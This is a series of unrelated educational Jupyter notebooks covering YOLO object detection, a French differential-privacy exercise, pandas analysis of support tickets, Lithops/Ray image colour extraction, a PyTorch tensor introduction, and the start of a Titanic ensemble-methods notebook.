iou_threshold -- real value, "intersection over union" threshold used for NMS filtering
Returns:
scores -- tensor of shape (None, ), predicted score for each box
boxes -- tensor of shape (None, 4), predicted box coordinates
classes -- tensor of shape (None,), predicted class for each box
"""
### START CODE HERE ###
# Retrieve outputs of the YOLO model (≈1 line)
box_confidence, box_xy, box_wh, box_class_probs = yolo_outputs
# Convert boxes to be ready for filtering functions (convert boxes box_xy and box_wh to corner coordinates)
boxes = yolo_boxes_to_corners(box_xy, box_wh)
# Use one of the functions you've implemented to perform Score-filtering with a threshold of score_threshold (≈1 line)
scores, boxes, classes = yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold=score_threshold)
# Scale boxes back to original image shape.
boxes = scale_boxes(boxes, image_shape)
# Use one of the functions you've implemented to perform Non-max suppression with
# maximum number of boxes set to max_boxes and a threshold of iou_threshold (≈1 line)
scores, boxes, classes = yolo_non_max_suppression(scores, boxes, classes, max_boxes=max_boxes,
iou_threshold=iou_threshold)
### END CODE HERE ###
return scores, boxes, classes
with tf.Session() as test_b:
yolo_outputs = (tf.random_normal([19, 19, 5, 1], mean=1, stddev=4, seed = 1),
tf.random_normal([19, 19, 5, 2], mean=1, stddev=4, seed = 1),
tf.random_normal([19, 19, 5, 2], mean=1, stddev=4, seed = 1),
tf.random_normal([19, 19, 5, 80], mean=1, stddev=4, seed = 1))
scores, boxes, classes = yolo_eval(yolo_outputs)
print("scores[2] = " + str(scores[2].eval()))
print("boxes[2] = " + str(boxes[2].eval()))
print("classes[2] = " + str(classes[2].eval()))
print("scores.shape = " + str(scores.eval().shape))
print("boxes.shape = " + str(boxes.eval().shape))
print("classes.shape = " + str(classes.eval().shape))
```
**Expected Output**:
<table>
<tr>
<td>
**scores[2]**
</td>
<td>
138.791
</td>
</tr>
<tr>
<td>
**boxes[2]**
</td>
<td>
[ 1292.32971191 -278.52166748 3876.98925781 -835.56494141]
</td>
</tr>
<tr>
<td>
**classes[2]**
</td>
<td>
54
</td>
</tr>
<tr>
<td>
**scores.shape**
</td>
<td>
(10,)
</td>
</tr>
<tr>
<td>
**boxes.shape**
</td>
<td>
(10, 4)
</td>
</tr>
<tr>
<td>
**classes.shape**
</td>
<td>
(10,)
</td>
</tr>
</table>
## Summary for YOLO:
- Input image (608, 608, 3)
- The input image goes through a CNN, resulting in a (19,19,5,85) dimensional output.
- After flattening the last two dimensions, the output is a volume of shape (19, 19, 425):
- Each cell in a 19x19 grid over the input image gives 425 numbers.
- 425 = 5 x 85 because each cell contains predictions for 5 boxes, corresponding to 5 anchor boxes, as seen in lecture.
- 85 = 5 + 80 where 5 is because $(p_c, b_x, b_y, b_h, b_w)$ has 5 numbers, and 80 is the number of classes we'd like to detect
- You then select only few boxes based on:
- Score-thresholding: throw away boxes that have detected a class with a score less than the threshold
- Non-max suppression: Compute the Intersection over Union and avoid selecting overlapping boxes
- This gives you YOLO's final output.
## 3 - Test YOLO pre-trained model on images
In this part, you are going to use a pre-trained model and test it on the car detection dataset. We'll need a session to execute the computation graph and evaluate the tensors.
```
sess = K.get_session()
```
### 3.1 - Defining classes, anchors and image shape.
* Recall that we are trying to detect 80 classes, and are using 5 anchor boxes.
* We have gathered the information on the 80 classes and 5 boxes in two files "coco_classes.txt" and "yolo_anchors.txt".
* We'll read class names and anchors from text files.
* The car detection dataset has 720x1280 images, which we've pre-processed into 608x608 images.
```
class_names = read_classes("model_data/coco_classes.txt")
anchors = read_anchors("model_data/yolo_anchors.txt")
image_shape = (720., 1280.)
```
### 3.2 - Loading a pre-trained model
* Training a YOLO model takes a very long time and requires a fairly large dataset of labelled bounding boxes for a large range of target classes.
* You are going to load an existing pre-trained Keras YOLO model stored in "yolo.h5".
* These weights come from the official YOLO website, and were converted using a function written by Allan Zelener. References are at the end of this notebook. Technically, these are the parameters from the "YOLOv2" model, but we will simply refer to it as "YOLO" in this notebook.
Run the cell below to load the model from this file.
```
yolo_model = load_model("model_data/yolo.h5")
```
This loads the weights of a trained YOLO model. Here's a summary of the layers your model contains.
```
yolo_model.summary()
```
**Note**: On some computers, you may see a warning message from Keras. Don't worry about it if you do--it is fine.
**Reminder**: this model converts a preprocessed batch of input images (shape: (m, 608, 608, 3)) into a tensor of shape (m, 19, 19, 5, 85) as explained in Figure (2).
### 3.3 - Convert output of the model to usable bounding box tensors
The output of `yolo_model` is a (m, 19, 19, 5, 85) tensor that needs to pass through non-trivial processing and conversion. The following cell does that for you.
If you are curious about how `yolo_head` is implemented, you can find the function definition in the file ['keras_yolo.py'](https://github.com/allanzelener/YAD2K/blob/master/yad2k/models/keras_yolo.py). The file is located in your workspace in this path 'yad2k/models/keras_yolo.py'.
```
yolo_outputs = yolo_head(yolo_model.output, anchors, len(class_names))
```
You added `yolo_outputs` to your graph. This set of 4 tensors is ready to be used as input by your `yolo_eval` function.
### 3.4 - Filtering boxes
`yolo_outputs` gave you all the predicted boxes of `yolo_model` in the correct format. You're now ready to perform filtering and select only the best boxes. Let's now call `yolo_eval`, which you had previously implemented, to do this.
```
scores, boxes, classes = yolo_eval(yolo_outputs, image_shape)
```
### 3.5 - Run the graph on an image
Let the fun begin. You have created a graph that can be summarized as follows:
1. <font color='purple'> yolo_model.input </font> is given to `yolo_model`. The model is used to compute the output <font color='purple'> yolo_model.output </font>
2. <font color='purple'> yolo_model.output </font> is processed by `yolo_head`. It gives you <font color='purple'> yolo_outputs </font>
3. <font color='purple'> yolo_outputs </font> goes through a filtering function, `yolo_eval`. It outputs your predictions: <font color='purple'> scores, boxes, classes </font>
**Exercise**: Implement predict() which runs the graph to test YOLO on an image.
You will need to run a TensorFlow session, to have it compute `scores, boxes, classes`.
The code below also uses the following function:
```python
image, image_data = preprocess_image("images/" + image_file, model_image_size = (608, 608))
```
which outputs:
- image: a python (PIL) representation of your image used for drawing boxes. You won't need to use it.
- image_data: a numpy-array representing the image. This will be the input to the CNN.
**Important note**: when a model uses BatchNorm (as is the case in YOLO), you will need to pass an additional placeholder in the feed_dict {K.learning_phase(): 0}.
#### Hint: Using the TensorFlow Session object
* Recall that above, we called `K.get_Session()` and saved the Session object in `sess`.
* To evaluate a list of tensors, we call `sess.run()` like this:
```
sess.run(fetches=[tensor1,tensor2,tensor3],
feed_dict={yolo_model.input: the_input_variable,
K.learning_phase():0
}
```
* Notice that the variables `scores, boxes, classes` are not passed into the `predict` function, but these are global variables that you will use within the `predict` function.
```
def predict(sess, image_file):
"""
Runs the graph stored in "sess" to predict boxes for "image_file". Prints and plots the predictions.
Arguments:
sess -- your tensorflow/Keras session containing the YOLO graph
image_file -- name of an image stored in the "images" folder.
Returns:
out_scores -- tensor of shape (None, ), scores of the predicted boxes
out_boxes -- tensor of shape (None, 4), coordinates of the predicted boxes
out_classes -- tensor of shape (None, ), class index of the predicted boxes
Note: "None" actually represents the number of predicted boxes, it varies between 0 and max_boxes.
"""
# Preprocess your image
image, image_data = preprocess_image("images/" + image_file, model_image_size = (608, 608))
# Run the session with the correct tensors and choose the correct placeholders in the feed_dict.
# You'll need to use feed_dict={yolo_model.input: ... , K.learning_phase(): 0})
### START CODE HERE ### (≈ 1 line)
out_scores, out_boxes, out_classes = sess.run([scores, boxes, classes], feed_dict={yolo_model.input: image_data,
K.learning_phase(): 0})
### END CODE HERE ###
# Print predictions info
print('Found {} boxes for {}'.format(len(out_boxes), image_file))
# Generate colors for drawing bounding boxes.
colors = generate_colors(class_names)
# Draw bounding boxes on the image file
draw_boxes(image, out_scores, out_boxes, out_classes, class_names, colors)
# Save the predicted bounding box on the image
image.save(os.path.join("out", image_file), quality=90)
# Display the results in the notebook
output_image = scipy.misc.imread(os.path.join("out", image_file))
imshow(output_image)
return out_scores, out_boxes, out_classes
```
Run the following cell on the "test.jpg" image to verify that your function is correct.
```
out_scores, out_boxes, out_classes = predict(sess, "test.jpg")
```
**Expected Output**:
<table>
<tr>
<td>
**Found 7 boxes for test.jpg**
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.60 (925, 285) (1045, 374)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.66 (706, 279) (786, 350)
</td>
</tr>
<tr>
<td>
**bus**
</td>
<td>
0.67 (5, 266) (220, 407)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.70 (947, 324) (1280, 705)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.74 (159, 303) (346, 440)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.80 (761, 282) (942, 412)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.89 (367, 300) (745, 648)
</td>
</tr>
</table>
The model you've just run is actually able to detect 80 different classes listed in "coco_classes.txt". To test the model on your own images:
1. Click on "File" in the upper bar of this notebook, then click "Open" to go on your Coursera Hub.
2. Add your image to this Jupyter Notebook's directory, in the "images" folder
3. Write your image's name in the cell above code
4. Run the code and see the output of the algorithm!
If you were to run your session in a for loop over all your images. Here's what you would get:
<center>
<video width="400" height="200" src="nb_images/pred_video_compressed2.mp4" type="video/mp4" controls>
</video>
</center>
<caption><center> Predictions of the YOLO model on pictures taken from a camera while driving around the Silicon Valley <br> Thanks [drive.ai](https://www.drive.ai/) for providing this dataset! </center></caption>
## <font color='darkblue'>What you should remember:
- YOLO is a state-of-the-art object detection model that is fast and accurate
- It runs an input image through a CNN which outputs a 19x19x5x85 dimensional volume.
- The encoding can be seen as a grid where each of the 19x19 cells contains information about 5 boxes.
- You filter through all the boxes using non-max suppression. Specifically:
- Score thresholding on the probability of detecting a class to keep only accurate (high probability) boxes
- Intersection over Union (IoU) thresholding to eliminate overlapping boxes
- Because training a YOLO model from randomly initialized weights is non-trivial and requires a large dataset as well as lot of computation, we used previously trained model parameters in this exercise. If you wish, you can also try fine-tuning the YOLO model with your own dataset, though this would be a fairly non-trivial exercise.
**References**: The ideas presented in this notebook came primarily from the two YOLO papers. The implementation here also took significant inspiration and used many components from Allan Zelener's GitHub repository. The pre-trained weights used in this exercise came from the official YOLO website.
- Joseph Redmon, Santosh Divvala, Ross Girshick, Ali Farhadi - [You Only Look Once: Unified, Real-Time Object Detection](https://arxiv.org/abs/1506.02640) (2015)
- Joseph Redmon, Ali Farhadi - [YOLO9000: Better, Faster, Stronger](https://arxiv.org/abs/1612.08242) (2016)
- Allan Zelener - [YAD2K: Yet Another Darknet 2 Keras](https://github.com/allanzelener/YAD2K)
- The official YOLO website (https://pjreddie.com/darknet/yolo/)
**Car detection dataset**:
<a rel="license" href="http://creativecommons.org/licenses/by/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by/4.0/88x31.png" /></a><br /><span xmlns:dct="http://purl.org/dc/terms/" property="dct:title">The Drive.ai Sample Dataset</span> (provided by drive.ai) is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License</a>. We are grateful to Brody Huval, Chih Hu and Rahul Patel for providing this data.
|
github_jupyter
|
# Exercice 2
Ce deuxième exercice va se produire dans une partie `code` où vous devez écrire quelques lignes de Python! Mais pas de soucis, on va y aller progressivement.
En-dessous de ce block de texte vous trouverez trois blocks pour les trois niveaux de l'exercice.
On va se pencher sur la *Differential Privacy* et faire quelques exercices dessus.
## 1. Connaissance
Dans la première partie vous trouvez une petite fonction qui prend comme entrée si vous êtes un délinquant, et qui sort une réponse protégée par la *Differential Privacy*.
si vous faites tourner le code, il vous donnera quelques réponses pour des entrées différentes.
Vous pouvez faire tourner le block plusieurs fois, et il devrait vous afficher des résultats différents presque chaque fois.
```
# Exercice 2 - Partie 1
import random
# Returns True or False for a coin toss. The random.choice method chooses randombly between
# the two values. Think of "True" as "Tail", and "False" as "Head"
def coin() -> bool:
return random.choice([True, False])
# Differential Privacy 1 - takes a vairable as input that indicates if the real value is guilty or
# not. Then it uses DP to decide whether it should output the real value, or a made-up guiltyness.
def dp_1(guilty: bool) -> bool:
if coin():
return guilty
else:
return coin()
# A pretty-printing method that shows nicely what is going on.
def print_guilty(guilty: bool) -> str:
if guilty:
print("Is guilty")
else:
print("Is innocent")
# Two outputs for a guilty and an innocent person:
print_guilty(dp_1(True))
print_guilty(dp_1(False))
```
## 2. Compréhension
### Générateurs aléatoire
Pourquoi en lançant le block plusieurs fois vous recevez des résultats différents *presque* chaque fois?
### Espérance mathématique
On va essayer de trouver l'espérance mathématique de notre function dépendant si on est innocent ou pas. Au lieu de le faire mathémeatiquement, on va le faire par essai et contage, et un peu de bon sens...
Dans le block `Exercice 2 - Partie 2`, ajoutez 10 fois la ligne suivante:
print_guilty(dp_1(True))
puis lancez le block.
- Combien de fois vous trouvez `guilty`, combien de fois `innocent`?
- Quelle est donc l'espérance mathématique si on met `guilty` à `1`, et `innocent` à `0`?
- La même question, mais si on met `print_guilty(dp_1(False))`
### Correction de la DP
- Supposons qu'on a seulement une personne qui est coupable - combien de coupables va-t-on trouver en moyenne?
- En connaissant l'espérence mathématique de `dp_1(False)`, comment on peut calculer la valeur probable de personnes coupables?
```
# Exercice 2 - Partie 2
```
## 3. Application
Si vous connaissez un peu la programmation, alors on peut faire les calculs un peu plus correcte.
### Créer un nombre élevé de mesures
La première méthode `create_measures` va remplacer notre utilisation ligne par ligne d'appel à `dp_1`.
Le paramètre `p_guilty` indique la probabilité entre 0 et 1 qu'un élément est coupable.
### Calculer le nombre de personnes coupables
La deuxième méthode `calculate_guilty` prend la sortie de `create_measures` pour calculer le nombre
probable de personnes coupables.
Il faudra d'abord compter le nombre de `True` dans l'entré, puis le mettre en relation avec le nombre
total de réponses.
Après il faut corriger par rapport à l'érreur introduite par la DP.
```
# Exercice 2 - Partie 3
# This method returns a number of throws where each throw is randomly chosen to be
# from a guilty person with probability p_guilty.
# The return value should be an array of booleans.
def create_measures(throws: int, p_guilty: float) -> [bool]:
pass
# Returns the most probable number of guilty persons given the array of results.
def calculate_guilty(results: [bool]) -> float:
pass
# This should print a number close to 0.1 * 100 = 10 guilty persons.
print(f'The number of guilty persons are: {calculate_guilty(create_measures(100, 0.1))}')
```
|
github_jupyter
|
```
import pandas as pd
fh = '../files/tickets-gen-all.csv'
df = pd.read_csv(fh, index_col=0, parse_dates=['created', 'opened_at', 'updated_on', 'resolved'])
df.shape
df.columns
```
##### cataloging active tickets only
```
cadf = df[((df['category'] == 'Cataloging') | (df['assignment_group'] == 'BKOPS CAT')) & ((df['state'] != 'Closed') & (df['state'] != 'Resolved'))]
```
## Cataloging tickets requiring category change (diff dept)
```
df['category'].unique()
df['assignment_group'].unique()
cat_change_df = df[(df['category'] == 'Cataloging') & ((df['assignment_group'] != 'BKOPS CAT') & (df['assignment_group'].notnull()))]
cat_change_df.shape[0]
cat_change_df_active = cat_change_df[(cat_change_df['state'] != 'Closed') & (cat_change_df['state'] != 'Resolved')]
print(f'# of tickets: {cat_change_df_active.shape[0]}')
```
## Awaiting User & Vendor tickets
```
awaiting_df = cadf[((cadf['state'] == 'Awaiting Vendor') | (cadf['state'] == 'Awaiting User Info')) & (cadf['created'] < '2020-01-01')]
awaiting_df['state'].unique()
print(f'# of tickets: {awaiting_df.shape[0]}')
```
### NEW tickets backlog (older than mid February 2020)
```
new_backlog_df = cadf[(cadf['state'] == 'New') & (cadf['assigned_to'].isnull())]
new_backlog_df.shape[0]
for lib, ldf in new_backlog_df.groupby('system'):
print(lib, f'# of tickets: {ldf.shape[0]}')
```
## Active CAT tickets
```
years = [2013, 2014, 2015, 2016, 2017, 2018, 2019, 2020]
caadf = cadf[cadf['state'] == 'Active']
for lib, ldf in caadf.groupby('system'):
staff_df = pd.DataFrame(columns=['staff', 'year', 'tickets'])
for staff, sdf in ldf.groupby('assigned_to'):
d = dict()
for y, ydf in sdf.groupby(sdf['created'].map(lambda x: x.year)):
d[y]={'staff': staff, 'year': y, 'tickets': ydf.shape[0]}
for y in years:
if y in d.keys():
staff_df = staff_df.append(d[y], ignore_index=True)
else:
staff_df = staff_df.append({'staff': staff, 'year': y, 'tickets': 0}, ignore_index=True)
staff_df.to_csv(f'../data-display/{lib}-active-tickets-by-staff.csv', index=False)
```
#### active by library per year
```
lib_out_df = pd.DataFrame(columns=['library', 'year', 'tickets'])
for lib, ldf in caadf.groupby('system'):
d = dict()
for y, ydf in ldf.groupby(ldf['created'].map(lambda x: x.year)):
d[y]={'library': lib, 'year': y, 'tickets': ydf.shape[0]}
for y in years:
if y in d.keys():
lib_out_df = lib_out_df.append(d[y], ignore_index=True)
else:
lib_out_df = lib_out_df.append({'library': lib, 'year': y, 'tickets': 0}, ignore_index=True)
lib_out_df.to_csv('../data-display/cat-active-tickets-per-lib-timeline.csv', index=False)
```
#### Active categories
```
cat_out_df = pd.DataFrame(columns=['subcategory', 'tickets'])
for cat, cdf in caadf.groupby('subcategory'):
print(cat, cdf.shape[0])
cat_out_df = cat_out_df.append(
dict(
subcategory=cat,
tickets=cdf.shape[0]
),
ignore_index=True
)
cat_out_df.head()
cat_out_df.to_csv('../data-display/cat-active-by-category.csv', index=False)
for lib, ldf in caadf.groupby('system'):
lib_out_df = pd.DataFrame(columns=['category', 'tickets'])
for cat, cdf in ldf.groupby('subcategory'):
lib_out_df = lib_out_df.append(
dict(
category=cat,
tickets=cdf.shape[0]
),
ignore_index=True)
lib_out_df.to_csv(f'../data-display/{lib}-active-tickets-by-category.csv', index=False)
```
|
github_jupyter
|
# Color extraction from images with Lithops4Ray
In this tutorial we explain how to use Lithops4Ray to extract colors and [HSV](https://en.wikipedia.org/wiki/HSL_and_HSV) color range from the images persisted in the IBM Cloud Oject Storage. To experiment with this tutorial, you can use any public image dataset and upload it to your bucket in IBM Cloud Object Storage. For example follow [Stanford Dogs Dataset](http://vision.stanford.edu/aditya86/ImageNetDogs/) to download images. We also provide upload [script](https://github.com/project-codeflare/data-integration/blob/main/scripts/upload_to_ibm_cos.py) that can be used to upload local images to the IBM Cloud Object Storage
Our code is using colorthief package that need to be installed in the Ray cluster, both on head and worker nodes. You can edit `cluster.yaml` file and add
`- pip install colorthief`
To the `setup_commands` section. This will ensure that once Ray cluster is started required package will be installed automatically.
```
import lithops
import ray
```
We write function that extracts color from a single image. Once invoked, Lithops framework will inject a reserved parameter `obj` that points to the data stream of the image. More information on the reserved `obj` parameter can be found [here](https://github.com/lithops-cloud/lithops/blob/master/docs/data_processing.md#processing-data-from-a-cloud-object-storage-service)
```
def extract_color(obj):
from colorthief import ColorThief
body = obj.data_stream
dominant_color = ColorThief(body).get_color(quality=10)
return dominant_color, obj.key
```
We now write a Ray task that will return image name and HSV color range of the image. Instead of a direct call to extract_color function, Lithops is being used behind the scenes (through the data object) to call it only at the right moment.
```
@ray.remote
def identify_colorspace(data):
import colorsys
color, name = data.result()
hsv = colorsys.rgb_to_hsv(color[0], color[1], color[2])
val = hsv[0] * 180
return name, val
```
Now let's tie all together with a main method. By using Lithops allows us to remove all the boiler plate code required to list data from the object storage. It also inspects the data source by using the internal Lithops data partitioner and creates a lazy execution plan, where each entry maps an "extract_color" function to a single image. Moreover, Lithops creates a single authentication token that is used by all the tasks, instead of letting each task perform authentication. The parallelism is controlled by Ray and once Ray task is executed, it will call Lithops to execute the extract_color function directly in the context of the calling task. Thus, by using Lithops, we can allow code to access object storage data, without requiring additional coding effort from the user.
```
if __name__ == '__main__':
ray.init(ignore_reinit_error=True)
fexec = lithops.LocalhostExecutor(log_level=None)
my_data = fexec.map(extract_color, 'cos://<bucket>/<path to images>/')
results = [identify_colorspace.remote(d) for d in my_data]
for res in results:
value = ray.get(res)
print("Image: " + value[0] + ", dominant color HSV range: " + str(value[1]))
ray.shutdown()
```
|
github_jupyter
|
# Introduction to Deep Learning with PyTorch
In this notebook, you'll get introduced to [PyTorch](http://pytorch.org/), a framework for building and training neural networks. PyTorch in a lot of ways behaves like the arrays you love from Numpy. These Numpy arrays, after all, are just tensors. PyTorch takes these tensors and makes it simple to move them to GPUs for the faster processing needed when training neural networks. It also provides a module that automatically calculates gradients (for backpropagation!) and another module specifically for building neural networks. All together, PyTorch ends up being more coherent with Python and the Numpy/Scipy stack compared to TensorFlow and other frameworks.
## Neural Networks
Deep Learning is based on artificial neural networks which have been around in some form since the late 1950s. The networks are built from individual parts approximating neurons, typically called units or simply "neurons." Each unit has some number of weighted inputs. These weighted inputs are summed together (a linear combination) then passed through an activation function to get the unit's output.
<img src="assets/simple_neuron.png" width=400px>
Mathematically this looks like:
$$
\begin{align}
y &= f(w_1 x_1 + w_2 x_2 + b) \\
y &= f\left(\sum_i w_i x_i +b \right)
\end{align}
$$
With vectors this is the dot/inner product of two vectors:
$$
h = \begin{bmatrix}
x_1 \, x_2 \cdots x_n
\end{bmatrix}
\cdot
\begin{bmatrix}
w_1 \\
w_2 \\
\vdots \\
w_n
\end{bmatrix}
$$
## Tensors
It turns out neural network computations are just a bunch of linear algebra operations on *tensors*, a generalization of matrices. A vector is a 1-dimensional tensor, a matrix is a 2-dimensional tensor, an array with three indices is a 3-dimensional tensor (RGB color images for example). The fundamental data structure for neural networks are tensors and PyTorch (as well as pretty much every other deep learning framework) is built around tensors.
<img src="assets/tensor_examples.svg" width=600px>
With the basics covered, it's time to explore how we can use PyTorch to build a simple neural network.
```
# First, import PyTorch
import torch
def activation(x):
""" Sigmoid activation function
Arguments
---------
x: torch.Tensor
"""
return 1/(1+torch.exp(-x))
### Generate some data
torch.manual_seed(7) # Set the random seed so things are predictable
# Features are 5 random normal variables
features = torch.randn((1, 5))
# True weights for our data, random normal variables again
weights = torch.randn_like(features)
# and a true bias term
bias = torch.randn((1, 1))
```
Above I generated data we can use to get the output of our simple network. This is all just random for now, going forward we'll start using normal data. Going through each relevant line:
`features = torch.randn((1, 5))` creates a tensor with shape `(1, 5)`, one row and five columns, that contains values randomly distributed according to the normal distribution with a mean of zero and standard deviation of one.
`weights = torch.randn_like(features)` creates another tensor with the same shape as `features`, again containing values from a normal distribution.
Finally, `bias = torch.randn((1, 1))` creates a single value from a normal distribution.
PyTorch tensors can be added, multiplied, subtracted, etc, just like Numpy arrays. In general, you'll use PyTorch tensors pretty much the same way you'd use Numpy arrays. They come with some nice benefits though such as GPU acceleration which we'll get to later. For now, use the generated data to calculate the output of this simple single layer network.
> **Exercise**: Calculate the output of the network with input features `features`, weights `weights`, and bias `bias`. Similar to Numpy, PyTorch has a [`torch.sum()`](https://pytorch.org/docs/stable/torch.html#torch.sum) function, as well as a `.sum()` method on tensors, for taking sums. Use the function `activation` defined above as the activation function.
```
## Calculate the output of this network using the weights and bias tensors
y_hat = activation(torch.mm(features, weights.T) + bias)
print(y_hat)
```
You can do the multiplication and sum in the same operation using a matrix multiplication. In general, you'll want to use matrix multiplications since they are more efficient and accelerated using modern libraries and high-performance computing on GPUs.
Here, we want to do a matrix multiplication of the features and the weights. For this we can use [`torch.mm()`](https://pytorch.org/docs/stable/torch.html#torch.mm) or [`torch.matmul()`](https://pytorch.org/docs/stable/torch.html#torch.matmul) which is somewhat more complicated and supports broadcasting. If we try to do it with `features` and `weights` as they are, we'll get an error
```python
>> torch.mm(features, weights)
---------------------------------------------------------------------------
RuntimeError Traceback (most recent call last)
<ipython-input-13-15d592eb5279> in <module>()
----> 1 torch.mm(features, weights)
RuntimeError: size mismatch, m1: [1 x 5], m2: [1 x 5] at /Users/soumith/minicondabuild3/conda-bld/pytorch_1524590658547/work/aten/src/TH/generic/THTensorMath.c:2033
```
As you're building neural networks in any framework, you'll see this often. Really often. What's happening here is our tensors aren't the correct shapes to perform a matrix multiplication. Remember that for matrix multiplications, the number of columns in the first tensor must equal to the number of rows in the second column. Both `features` and `weights` have the same shape, `(1, 5)`. This means we need to change the shape of `weights` to get the matrix multiplication to work.
**Note:** To see the shape of a tensor called `tensor`, use `tensor.shape`. If you're building neural networks, you'll be using this method often.
There are a few options here: [`weights.reshape()`](https://pytorch.org/docs/stable/tensors.html#torch.Tensor.reshape), [`weights.resize_()`](https://pytorch.org/docs/stable/tensors.html#torch.Tensor.resize_), and [`weights.view()`](https://pytorch.org/docs/stable/tensors.html#torch.Tensor.view).
* `weights.reshape(a, b)` will return a new tensor with the same data as `weights` with size `(a, b)` sometimes, and sometimes a clone, as in it copies the data to another part of memory.
* `weights.resize_(a, b)` returns the same tensor with a different shape. However, if the new shape results in fewer elements than the original tensor, some elements will be removed from the tensor (but not from memory). If the new shape results in more elements than the original tensor, new elements will be uninitialized in memory. Here I should note that the underscore at the end of the method denotes that this method is performed **in-place**. Here is a great forum thread to [read more about in-place operations](https://discuss.pytorch.org/t/what-is-in-place-operation/16244) in PyTorch.
* `weights.view(a, b)` will return a new tensor with the same data as `weights` with size `(a, b)`.
I usually use `.view()`, but any of the three methods will work for this. So, now we can reshape `weights` to have five rows and one column with something like `weights.view(5, 1)`.
> **Exercise**: Calculate the output of our little network using matrix multiplication.
```
## Calculate the output of this network using matrix multiplication
```
### Stack them up!
That's how you can calculate the output for a single neuron. The real power of this algorithm happens when you start stacking these individual units into layers and stacks of layers, into a network of neurons. The output of one layer of neurons becomes the input for the next layer. With multiple input units and output units, we now need to express the weights as a matrix.
<img src='assets/multilayer_diagram_weights.png' width=450px>
The first layer shown on the bottom here are the inputs, understandably called the **input layer**. The middle layer is called the **hidden layer**, and the final layer (on the right) is the **output layer**. We can express this network mathematically with matrices again and use matrix multiplication to get linear combinations for each unit in one operation. For example, the hidden layer ($h_1$ and $h_2$ here) can be calculated
$$
\vec{h} = [h_1 \, h_2] =
\begin{bmatrix}
x_1 \, x_2 \cdots \, x_n
\end{bmatrix}
\cdot
\begin{bmatrix}
w_{11} & w_{12} \\
w_{21} &w_{22} \\
\vdots &\vdots \\
w_{n1} &w_{n2}
\end{bmatrix}
$$
The output for this small network is found by treating the hidden layer as inputs for the output unit. The network output is expressed simply
$$
y = f_2 \! \left(\, f_1 \! \left(\vec{x} \, \mathbf{W_1}\right) \mathbf{W_2} \right)
$$
```
### Generate some data
torch.manual_seed(7) # Set the random seed so things are predictable
# Features are 3 random normal variables
features = torch.randn((1, 3))
# Define the size of each layer in our network
n_input = features.shape[1] # Number of input units, must match number of input features
n_hidden = 2 # Number of hidden units
n_output = 1 # Number of output units
# Weights for inputs to hidden layer
W1 = torch.randn(n_input, n_hidden)
# Weights for hidden layer to output layer
W2 = torch.randn(n_hidden, n_output)
# and bias terms for hidden and output layers
B1 = torch.randn((1, n_hidden))
B2 = torch.randn((1, n_output))
```
> **Exercise:** Calculate the output for this multi-layer network using the weights `W1` & `W2`, and the biases, `B1` & `B2`.
```
## Your solution here
y_hat = activation(torch.mm(activation(torch.mm(features, W1) + B1), W2) + B2)
print(y_hat)
```
If you did this correctly, you should see the output `tensor([[ 0.3171]])`.
The number of hidden units a parameter of the network, often called a **hyperparameter** to differentiate it from the weights and biases parameters. As you'll see later when we discuss training a neural network, the more hidden units a network has, and the more layers, the better able it is to learn from data and make accurate predictions.
## Numpy to Torch and back
Special bonus section! PyTorch has a great feature for converting between Numpy arrays and Torch tensors. To create a tensor from a Numpy array, use `torch.from_numpy()`. To convert a tensor to a Numpy array, use the `.numpy()` method.
```
import numpy as np
a = np.random.rand(4,3)
a
b = torch.from_numpy(a)
b
b.numpy()
```
The memory is shared between the Numpy array and Torch tensor, so if you change the values in-place of one object, the other will change as well.
```
# Multiply PyTorch Tensor by 2, in place
b.mul_(2)
# Numpy array matches new values from Tensor
a
```
|
github_jupyter
|
<h1><center>CS 455/595a: Ensemble Methods - bagging and random forests</center></h1>
<center>Richard S. Stansbury</center>
This notebook applies the bagging and random forest ensemble classification and regression concepts concepts covered in [1] with the [Titanic](https://www.kaggle.com/c/titanic/) and [Boston Housing](https://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_boston.html) data sets for DT-based classification and regression, respectively.
Note: you must install the graphviz package for Python. Please do this install using pip or conda. i.e. "conda install graphviz"
Reference:
[1] Aurelen Geron. *Hands on Machine Learning with Scikit-Learn & TensorFlow* O'Reilley Media Inc, 2017.
[2] Aurelen Geron. "ageron/handson-ml: A series of Jupyter notebooks that walk you through the fundamentals of Machine Learning and Deep Learning in python using Scikit-Learn and TensorFlow." Github.com, online at: https://github.com/ageron/handson-ml [last accessed 2019-03-01]
**Table of Contents**
1. [Titanic Survivor Ensemble Classifiers](#Titanic-Survivor-Classifier)
2. [Boston Housing Cost Ensemble Regressors](#Boston-Housing-Cost-Estimator)
# Titanic Survivor Classifier
## Set up - Imports of libraries and Data Preparation
```
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.impute import SimpleImputer
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix, precision_score, recall_score, accuracy_score, f1_score
from sklearn.metrics import mean_squared_error, mean_absolute_error
from sklearn.model_selection import cross_val_predict
from sklearn import datasets
from matplotlib import pyplot as plt
%matplotlib inline
import numpy as np
import pandas as pd
import os
# Read data from input files into Pandas data frames
data_path = os.path.join("datasets","titanic")
train_filename = "train.csv"
test_filename = "test.csv"
def read_csv(data_path, filename):
joined_path = os.path.join(data_path, filename)
return pd.read_csv(joined_path)
# Read CSV file into Pandas Dataframes
train_df = read_csv(data_path, train_filename)
# Defining Data Pre-Processing Pipelines
class DataFrameSelector(BaseEstimator, TransformerMixin):
def __init__(self, attributes):
self.attributes = attributes
def fit(self, X, y=None):
return self
def transform(self, X):
return X[self.attributes]
class MostFrequentImputer(BaseEstimator, TransformerMixin):
def fit(self, X, y=None):
self.most_frequent = pd.Series([X[c].value_counts().index[0] for c in X],
index = X.columns)
return self
def transform(self, X):
return X.fillna(self.most_frequent)
numeric_pipe = Pipeline([
("Select", DataFrameSelector(["Age", "Fare", "SibSp", "Parch"])), # Selects Fields from dataframe
("Imputer", SimpleImputer(strategy="median")), # Fills in NaN w/ median value for its column
])
#Handle categorical string for sex by encoding as female true, 1 or false,0
